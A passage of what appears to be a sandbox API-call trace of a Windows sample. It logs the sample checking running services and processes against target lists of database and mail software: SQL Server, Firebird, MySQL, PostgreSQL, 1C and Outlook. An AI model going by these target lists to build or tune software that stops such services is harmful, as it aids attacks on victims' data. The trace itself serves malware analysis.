(lpString1="sqlwriter", lpString2="DPS") returned 1 [0047.941] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0047.941] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0047.942] lstrlenW (lpString="eventlog") returned 8 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0047.942] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0047.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0047.942] lstrlenW (lpString="EventSystem") returned 11 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0047.942] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0047.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0047.942] lstrlenW (lpString="gpsvc") returned 5 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0047.942] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0047.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0047.942] lstrlenW (lpString="iphlpsvc") returned 8 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0047.942] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0047.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0047.942] lstrlenW (lpString="LanmanServer") returned 12 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0047.942] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0047.942] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0047.942] lstrlenW (lpString="LanmanWorkstation") returned 17 [0047.942] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.942] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0047.942] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0047.943] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0047.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0047.943] lstrlenW (lpString="lmhosts") returned 7 [0047.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0047.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0047.943] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0047.943] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0047.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0047.943] lstrlenW (lpString="MMCSS") returned 5 [0047.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0047.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0047.943] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0047.943] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0047.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0047.943] lstrlenW (lpString="MpsSvc") returned 6 [0047.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0047.943] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0047.943] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0047.943] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0047.943] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0047.943] lstrlenW (lpString="Netman") returned 6 [0047.943] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0047.944] lstrlenW (lpString="netprofm") returned 8 [0047.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0047.944] lstrlenW (lpString="NlaSvc") returned 6 [0047.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0047.944] lstrlenW (lpString="nsi") returned 3 [0047.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0047.944] lstrlenW (lpString="PcaSvc") returned 6 [0047.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0047.944] lstrlenW (lpString="PlugPlay") returned 8 [0047.944] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0047.944] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0047.944] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0047.944] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0047.944] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0047.944] lstrlenW (lpString="Power") returned 5 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0047.945] lstrlenW (lpString="ProfSvc") returned 7 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0047.945] lstrlenW (lpString="RpcEptMapper") returned 12 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0047.945] lstrlenW (lpString="RpcSs") returned 5 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0047.945] lstrlenW (lpString="SamSs") returned 5 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0047.945] lstrlenW (lpString="Schedule") returned 8 [0047.945] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0047.945] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0047.945] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0047.945] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0047.945] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0047.946] lstrlenW (lpString="SENS") returned 4 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0047.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0047.946] lstrlenW (lpString="ShellHWDetection") returned 16 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0047.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0047.946] lstrlenW (lpString="Spooler") returned 7 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0047.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0047.946] lstrlenW (lpString="swprv") returned 5 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0047.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0047.946] lstrlenW (lpString="SysMain") returned 7 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0047.946] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0047.946] lstrlenW (lpString="Themes") returned 6 [0047.946] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0047.946] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0047.946] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0047.946] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0047.947] lstrlenW (lpString="TrkWks") returned 6 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0047.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0047.947] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0047.947] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0047.947] lstrlenW (lpString="UxSms") returned 5 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0047.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0047.947] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0047.947] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0047.947] lstrlenW (lpString="VSS") returned 3 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0047.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0047.947] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0047.947] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0047.947] lstrlenW (lpString="WdiServiceHost") returned 14 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0047.947] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0047.947] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0047.947] lstrlenW (lpString="WdiSystemHost") returned 13 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.947] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0047.947] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0047.947] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0047.947] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0047.947] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0047.947] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0047.948] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0047.948] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0047.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0047.948] lstrlenW (lpString="Winmgmt") returned 7 [0047.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0047.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0047.948] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0047.948] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0047.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0047.948] lstrlenW (lpString="WPDBusEnum") returned 10 [0047.948] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.948] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0047.948] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0047.948] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0047.948] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0047.948] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3940ef0 | out: hHeap=0x600000) returned 1 [0047.948] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0047.950] Process32FirstW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0047.950] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0047.951] lstrlenW (lpString="System") returned 6 [0047.951] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0047.951] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0047.951] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0047.952] lstrlenW (lpString="smss.exe") returned 8 [0047.952] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0047.952] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0047.952] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.953] lstrlenW (lpString="csrss.exe") returned 9 [0047.953] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0047.953] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0047.953] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0047.953] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0047.953] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0047.953] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0047.953] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0047.953] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0047.954] lstrlenW (lpString="wininit.exe") returned 11 [0047.954] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0047.954] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0047.954] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0047.954] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0047.955] lstrlenW (lpString="csrss.exe") returned 9 [0047.955] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0047.956] lstrlenW (lpString="winlogon.exe") returned 12 [0047.956] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0047.956] lstrlenW (lpString="services.exe") returned 12 [0047.956] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0047.957] lstrlenW (lpString="lsass.exe") returned 9 [0047.957] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0047.958] lstrlenW (lpString="lsm.exe") returned 7 [0047.958] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.958] lstrlenW (lpString="svchost.exe") returned 11 [0047.958] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.959] lstrlenW (lpString="svchost.exe") returned 11 [0047.959] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.960] lstrlenW (lpString="svchost.exe") returned 11 [0047.960] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.960] lstrlenW (lpString="svchost.exe") returned 11 [0047.960] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.961] lstrlenW (lpString="svchost.exe") returned 11 [0047.961] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0047.962] lstrlenW (lpString="audiodg.exe") returned 11 [0047.962] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.962] lstrlenW (lpString="svchost.exe") returned 11 [0047.962] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0047.963] lstrlenW (lpString="svchost.exe") returned 11 [0047.963] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0047.964] lstrlenW (lpString="dwm.exe") returned 7 [0047.964] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0047.964] lstrlenW (lpString="explorer.exe") returned 12 [0047.964] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0047.965] lstrlenW (lpString="spoolsv.exe") returned 11 [0047.965] Process32NextW (in: hSnapshot=0x208, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 